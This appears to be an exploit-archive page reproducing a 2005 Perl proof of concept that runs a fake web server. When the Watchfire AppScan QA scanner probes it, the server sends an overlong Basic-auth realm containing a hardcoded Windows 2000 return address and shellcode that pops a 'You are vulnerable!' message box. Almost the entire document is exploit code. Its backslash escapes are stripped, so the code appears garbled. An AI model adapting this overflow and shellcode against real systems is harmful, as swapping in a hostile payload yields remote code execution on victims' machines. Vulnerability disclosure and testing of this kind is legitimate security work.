Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Watchfire AppScan QA 5.0.x Remote Code Execution Exploit PoC
# Published : 2005-12-15
# Author : Mariano Nu?±ez
# Previous Title : Mozilla Firefox <= 1.04 compareTo() Remote Code Execution Exploit
# Next Title : Lyris ListManager Read Message Attachment SQL Injection Exploit

# Watchfire AppScan QA PoC - Coded by Mariano Nu?ez Di Croce @ CYBSEC
# 
# How to use:
#	1. Run this script to setup the fake web server.
#	2. Scan the server with AppScan QA, either in Interactive or Manual mode.
#	3. If you get an "You are vulnerable!" popup, you should upgrade inmediatly.
#
#	PoC developed for Windows 2000 Server SP4.
#

#!/usr/bin/perl -w

use IO::Socket::INET;

# Dissable buffering
$| = 1;

# Define 200 OK Responses
my $res200 = "HTTP/1.1 200 OKrnHost: www.test.comrnDate: Thu, 01 Nov 2005 14:38:20 GMTrnServer: ApachernContent-Length: 26rnKeep-Alive: timeout=15, max=100rnConnection: ClosernContent-Type: text/html; charset=ISO-8859-1rnrn<a href='/admin'>admin</a>";

# Define the 401 Auth Required Header and Tail
my $res401Head = "HTTP/1.1 401 Authorization RequiredrnHost: www.test.comrnDate: Thu, 01 Nov 2005 14:43:53 GMTrnServer: ApachernWWW-Authenticate: Basic realm="";

my $res401Tail = "Content-Length: 401rnKeep-Alive: timeout=15, max=100rnConnection: ClosernContent-Type: text/html; charset=iso-8859-1rnrn<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML2.0//EN">rn<html><head>rn<title>401 Authorization Required</title>rn</head><body>rn<h1>Authorization Required</h1>rn<p>This server could not verify that yournare authorized to access the documentrnrequested.  Either you supplied the wrongrncredentials (e.g., bad password), or yourrnbrowser doesn't understand how to supplyrnthe credentials required.</p>rn</body></html>";

# Ret - call ebx - in user32.dll (Windows 2000 Server SP4)
my $ret = pack("l", 0x77e11627);

my $scode = "x31xd2xebx35x59x88x51x06xbbx21x02x59x7cx51xffxd3xebx33x59x31xd2x88x51x0bx51x50xbbxabx0cx59x7cxffxd3xebx33x59x31xd2x88x51x13x52x51x51x52xffxd0x31xd2x52xb8xbex69x59x7cxffxd0xe8xc6xffxffxffx75x73x65x72x33x32x4exe8xc8xffxffxffx4dx65x73x73x61x67x65x42x6fx78x41x4exe8xc8xffxffxffx59x6fx75x20x61x72x65x20x76x75x6cx6ex65x72x61x62x6cx65x21x4e";

my $resExploit = $res401Head . "x41"x347 . "xebx06AA". $ret . $scode . ""rn" . $res401Tail;

# Initialization of Fake WebServer
my $srv = IO::Socket::INET->new(LocalPort => 80,
			      	Reuse => 1, 
				Listen => 1 ) || die "Could not create socket: $!n";

print "Waiting for connections...n";
							
while ($cli = $srv->accept()) {
	printf "Request from %sn", $cli->peerhost;	
	while (<$cli>) {
		if (s/(admin)/$1/) {
			# If Request is for "admin", launch the exploit 
			printf "Request for protected resource detected...launching exploitn";		
			print $cli $resExploit;
		}
		else {
			# Else send a normal response 
			print $cli $res200;	
		}
	}
	close($cli);
}
close($srv);


# www.Syue.com [2005-12-15]